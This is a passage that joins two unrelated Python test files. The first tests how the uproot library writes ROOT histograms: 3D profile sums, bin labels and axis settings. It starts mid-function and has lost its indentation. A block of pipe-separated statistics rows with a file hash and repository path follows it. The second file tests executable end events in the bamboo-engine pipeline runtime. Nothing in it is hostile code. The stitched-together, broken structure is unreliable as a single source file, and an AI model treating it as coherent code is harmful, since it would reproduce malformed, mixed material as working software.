sums = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 36.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 49.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
bincontents = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
count = 0
for x in range(1, 6):
for y in range(1, 7):
for z in range(1, 9):
assert h.GetBinContent(x, y, z) == bincontents[count]
count += 1
assert list(h.GetSumw2()) == sums
assert h.GetMean() == 1.5
assert h.GetRMS() == 0.5
assert h.GetNbinsX() == 5
assert h.GetNbinsY() == 6
assert h.GetNbinsZ() == 8
def test_tprofile3d_uproot(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TProfile3D("hvar", "title", 5, 1, 10, 6, 1, 20, 8, 2, 5)
h.Sumw2()
h.Fill(1.0, 5.0, 3, 5)
h.Fill(2.0, 10.0, 4, 8)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
assert uproot.open(filename)["test"]._classname == b"TProfile3D"
def test_compressed_tprofile3d(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TProfile3D("hvar", "title", 5, 1, 10, 6, 1, 20, 8, 2, 8)
h.Sumw2()
h.Fill(1.0, 5.0, 3, 6)
h.Fill(2.0, 10.0, 4, 7)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=uproot.LZMA(6)) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
sums = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 36.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 49.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
bincontents = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
count = 0
for x in range(1, 6):
for y in range(1, 7):
for z in range(1, 9):
assert h.GetBinContent(x, y, z) == bincontents[count]
count += 1
assert list(h.GetSumw2()) == sums
assert h.GetMean() == 1.5
assert h.GetRMS() == 0.5
assert h.GetNbinsX() == 5
assert h.GetNbinsY() == 6
assert h.GetNbinsZ() == 8
def test_dir_allocation(tmp_path):
filename = join(str(tmp_path), "example.root")
with uproot.recreate(filename, compression=None) as f:
for i in range(1, 101):
f["a"*i] = "a"*i
f = ROOT.TFile.Open(filename)
assert str(f.Get("a"*100)) == "a"*100
f.Close()
def test_taxis_axisbins(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH1F("hvar", "title", 5, 1, 10)
h.Fill(1.0, 3)
h.Fill(3.0, 8)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
assert h.GetXaxis().GetFirst() == 1
assert h.GetXaxis().GetLast() == 5
def test_taxis_time(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH1F("hvar", "title", 5, 1, 10)
h.GetXaxis().SetTimeDisplay(1)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
assert h.GetXaxis().GetTimeDisplay() == True
def test_th1_binlabel1(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH1F("hvar", "title", 5, 1, 10)
h.Fill(1.0, 3)
h.GetXaxis().SetBinLabel(1, "Hi")
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
assert h.GetXaxis().GetBinLabel(1) == "Hi"
def test_th1_binlabel1_uproot(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH1F("hvar", "title", 5, 1, 10)
h.Fill(1.0, 3)
h.GetXaxis().SetBinLabel(1, "Hi")
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = uproot.open(filename)
h = f["test"]
assert h._fXaxis._fLabels[0] == b"Hi"
def test_th1_binlabel2(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH1F("hvar", "title", 5, 1, 10)
h.Fill(1.0, 3)
h.Fill(2.0, 4)
h.GetXaxis().SetBinLabel(1, "Hi")
h.GetXaxis().SetBinLabel(2, "Hello")
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
assert h.GetXaxis().GetBinLabel(1) == "Hi"
assert h.GetXaxis().GetBinLabel(2) == "Hello"
def test_th1_binlabel2_uproot(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH1F("hvar", "title", 5, 1, 10)
h.Fill(1.0, 3)
h.Fill(2.0, 4)
h.GetXaxis().SetBinLabel(1, "Hi")
h.GetXaxis().SetBinLabel(2, "Hello")
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = uproot.open(filename)
h = f["test"]
assert h._fXaxis._fLabels[0] == b"Hi"
assert h._fXaxis._fLabels[1] == b"Hello"
def test_th2_binlabel1(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH2F("hvar", "title", 5, 1, 10, 6, 1, 20)
h.Fill(1.0, 5.0, 3)
h.GetXaxis().SetBinLabel(1, "Hi1")
h.GetYaxis().SetBinLabel(2, "Hi2")
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
assert h.GetXaxis().GetBinLabel(1) == "Hi1"
assert h.GetYaxis().GetBinLabel(2) == "Hi2"
def test_th3_binlabel1(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH3F("hvar", "title", 5, 1, 10, 6, 1, 20, 7, 1, 30)
h.Fill(1.0, 5.0, 8.0, 3)
h.GetXaxis().SetBinLabel(1, "Hi1")
h.GetYaxis().SetBinLabel(2, "Hi2")
h.GetZaxis().SetBinLabel(3, "Hi3")
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
assert h.GetXaxis().GetBinLabel(1) == "Hi1"
assert h.GetYaxis().GetBinLabel(2) == "Hi2"
assert h.GetZaxis().GetBinLabel(3) == "Hi3"
def test_objany_multihist(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH1F("hvar", "title", 5, 1, 10)
h.Fill(1.0, 3)
h.GetXaxis().SetBinLabel(1, "Hi")
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f["test1"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
h1 = f.Get("test1")
assert h.GetXaxis().GetBinLabel(1) == "Hi"
assert h1.GetXaxis().GetBinLabel(1) == "Hi"
def test_objany_multihist_uproot(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH1F("hvar", "title", 5, 1, 10)
h.Fill(1.0, 3)
h.GetXaxis().SetBinLabel(1, "Hi")
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f["test1"] = hist
f = uproot.open(filename)
h = f["test"]
h1 = f["test1"]
assert h._fXaxis._fLabels[0] == b"Hi"
assert h1._fXaxis._fLabels[0] == b"Hi"
| 43.816724
| 2,813
| 0.52345
| 9,012
| 38,252
| 2.199845
| 0.018531
| 0.518436
| 0.771299
| 1.021135
| 0.95319
| 0.951425
| 0.948398
| 0.945574
| 0.942194
| 0.939622
| 0
| 0.211544
| 0.222315
| 38,252
| 872
| 2,814
| 43.866972
| 0.454888
| 0.002693
| 0
| 0.881119
| 0
| 0
| 0.053268
| 0
| 0
| 0
| 0
| 0
| 0.163636
| 1
| 0.055944
| false
| 0
| 0.013986
| 0
| 0.06993
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
8c31643d686e5bdf185625e1f34410df5b56f46f
| 3,614
|
py
|
Python
|
runtime/bamboo-pipeline/test/eri_imp_test_use/tests/execution/test_executable_end_event.py
|
DomineCore/bamboo-engine
|
fb4583e70f9e1e87d9d48c2393db8d8104306f37
|
[
"MIT"
] | 1
|
2022-01-06T15:44:43.000Z
|
2022-01-06T15:44:43.000Z
|
runtime/bamboo-pipeline/test/eri_imp_test_use/tests/execution/test_executable_end_event.py
|
DomineCore/bamboo-engine
|
fb4583e70f9e1e87d9d48c2393db8d8104306f37
|
[
"MIT"
] | null | null | null |
runtime/bamboo-pipeline/test/eri_imp_test_use/tests/execution/test_executable_end_event.py
|
DomineCore/bamboo-engine
|
fb4583e70f9e1e87d9d48c2393db8d8104306f37
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from bamboo_engine.builder import * # noqa
from bamboo_engine.engine import Engine
from pipeline.eri.runtime import BambooDjangoRuntime
from ..utils import * # noqa
def test_executable_end_event_execution():
start = EmptyStartEvent()
act = ServiceActivity(component_code="debug_node")
end = ExecutableEndEvent(type="MyTestEndEvent")
start.extend(act).extend(end)
pipeline = build_tree(start)
engine = Engine(BambooDjangoRuntime())
engine.run_pipeline(pipeline=pipeline, root_pipeline_data={})
sleep(1)
node_id_list = [pipeline["id"], start.id, act.id, end.id]
node_data_dict = {
pipeline["id"]: {"inputs": {}, "outputs": {}},
act.id: {"inputs": {"_loop": 1, "_inner_loop": 1}, "outputs": {"_loop": 1, "_inner_loop": 1, "_result": True}},
}
assert_all_finish(node_id_list)
assert_exec_data_equal(node_data_dict)
assert_schedule_finish(act.id, times=1)
def test_executable_end_event_raise():
start = EmptyStartEvent()
act = ServiceActivity(component_code="debug_node")
end = ExecutableEndEvent(type="MyRaiseEndEvent")
start.extend(act).extend(end)
pipeline = build_tree(start)
engine = Engine(BambooDjangoRuntime())
engine.run_pipeline(pipeline=pipeline, root_pipeline_data={})
sleep(1)
node_data_dict = {
act.id: {"inputs": {"_loop": 1, "_inner_loop": 1}, "outputs": {"_loop": 1, "_inner_loop": 1, "_result": True}},
}
assert_all_finish([start.id, act.id])
assert_all_running([pipeline["id"]])
assert_all_failed([end.id])
assert_exec_data_equal(node_data_dict)
assert_schedule_finish(act.id, times=1)
def test_executable_end_event_in_subprocess():
sub_start = EmptyStartEvent()
act = ServiceActivity(component_code="debug_node")
sub_end = ExecutableEndEvent(type="MyTestEndEvent")
sub_start.extend(act).extend(sub_end)
start = EmptyStartEvent()
subproc = SubProcess(start=sub_start)
end = ExecutableEndEvent(type="MyTestEndEvent")
start.extend(subproc).extend(end)
pipeline = build_tree(start)
engine = Engine(BambooDjangoRuntime())
engine.run_pipeline(pipeline=pipeline, root_pipeline_data={})
sleep(1)
node_id_list = [pipeline["id"], start.id, subproc.id, end.id, sub_start.id, act.id, sub_end.id]
node_data_dict = {
pipeline["id"]: {"inputs": {}, "outputs": {}},
act.id: {"inputs": {"_loop": 1, "_inner_loop": 1}, "outputs": {"_loop": 1, "_inner_loop": 1, "_result": True}},
}
assert_all_finish(node_id_list)
assert_exec_data_equal(node_data_dict)
assert_schedule_finish(act.id, times=1)
def test_executable_end_event_raise_in_subproc():
sub_start = EmptyStartEvent()
act = ServiceActivity(component_code="debug_node")
sub_end = ExecutableEndEvent(type="MyRaiseEndEvent")
sub_start.extend(act).extend(sub_end)
start = EmptyStartEvent()
subproc = SubProcess(start=sub_start)
end = ExecutableEndEvent(type="MyTestEndEvent")
start.extend(subproc).extend(end)
pipeline = build_tree(start)
engine = Engine(BambooDjangoRuntime())
engine.run_pipeline(pipeline=pipeline, root_pipeline_data={})
sleep(1)
node_data_dict = {
act.id: {"inputs": {"_loop": 1, "_inner_loop": 1}, "outputs": {"_loop": 1, "_inner_loop": 1, "_result": True}},
}
assert_all_finish([start.id, act.id, sub_start.id])
assert_all_running([pipeline["id"], subproc.id])
assert_all_failed([sub_end.id])
assert_exec_data_equal(node_data_dict)
assert_schedule_finish(act.id, times=1)
| 31.155172
| 119
| 0.692031
| 450
| 3,614
| 5.231111
| 0.14
| 0.033985
| 0.040782
| 0.047579
| 0.878505
| 0.860238
| 0.831351
| 0.831351
| 0.831351
| 0.831351
| 0
| 0.008278
| 0.164361
| 3,614
| 115
| 120
| 31.426087
| 0.771192
| 0.008578
| 0
| 0.7125
| 0
| 0
| 0.10394
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.05
| false
| 0
| 0.05
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
